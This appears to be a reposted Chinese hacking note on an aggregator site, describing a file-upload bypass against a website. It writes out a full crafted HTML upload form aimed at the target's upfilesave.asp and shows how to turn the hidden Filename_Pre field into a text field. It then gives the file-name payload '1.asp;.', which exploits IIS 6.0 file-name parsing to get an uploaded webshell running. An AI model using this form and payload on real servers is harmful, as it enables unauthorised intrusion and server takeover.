冲破手记 上传漏洞 hidden to text[网络技术]
本文“冲破手记 上传漏洞 hidden to text[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
本文是由一个上传的页面冲破上传引发的,话说当时群里谈论纷纷.发出XXX网站的上传地址,研究过来研究过去.没找到冲破,本地改正上传提交仍旧不能冲破.
就在当时,小三毛同志提出改正hidden to text操纵IIS漏洞可取webshell.咱也试下这招数若何
本地构造上传
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<LINK href="../css/css.css" rel=stylesheet type=text/css>
<title>上传图片</title>
</head>
<body leftmargin="0" topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="20" align="center">
</td>
</tr>
</table>
<table width="90%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#999999">
<form action="http://xxx.net/inn/upfilesave.asp" method="post" enctype="multipart/form-data">
<tr>
<td bgcolor="#FFFFFF"><table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td height="25" bgcolor="#CCCCCC" class="td_14">上传图片</td>
</tr>
</table></td>
</tr>
<tr>
<td height="35" align="center" bgcolor="#FFFFFF">
<input name="image" type="file" id="image">
</td>
</tr>
<tr>
<td height="35" align="center" bgcolor="#FFFFFF">
<input type="submit" name="Submit" value="提交" onClick="checkImage('image')">
<input name="PathFolder" type="hidden" id="PathFolder" value="/img/trade/">
<input name="FormName" type="hidden" id="FormName" value="add">
<input name="parent" type="hidden" id="parent" value="img">
<input name="Filename_Pre" type="text" id="Filename_Pre" value="">
<input name="Create" type="hidden" id="Create" value="">
<input type="reset" name="Submit2" value="关闭" onClick="javascript:window.close()">
</td>
</tr>
</form>
</table>
</body>
</html>
<script language=javascript>
function checkImage(sId)
{
if(( document.all[sId].value.indexOf(".asp") == -1) && (document.all[sId].value.indexOf(".asa") == -1)) {
//alert("请挑选gif或jpg的图象文件");
// event.returnValue = false;
}
}
</script> 保存为HTML...
本来
<input name="Filename_Pre" type="hidden" id="Filename_Pre" value="">
改正
<input name="Filename_Pre" type="text" id="Filename_Pre" value="">
翻开本地HTML提交页,上传时填充1.asp;.
成功返回1.asp;_201036165716.jpg.IIS 6.0,成功运行小马~
以上是“冲破手记 上传漏洞 hidden to text[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
本文地址: | 与您的QQ/BBS好友分享! |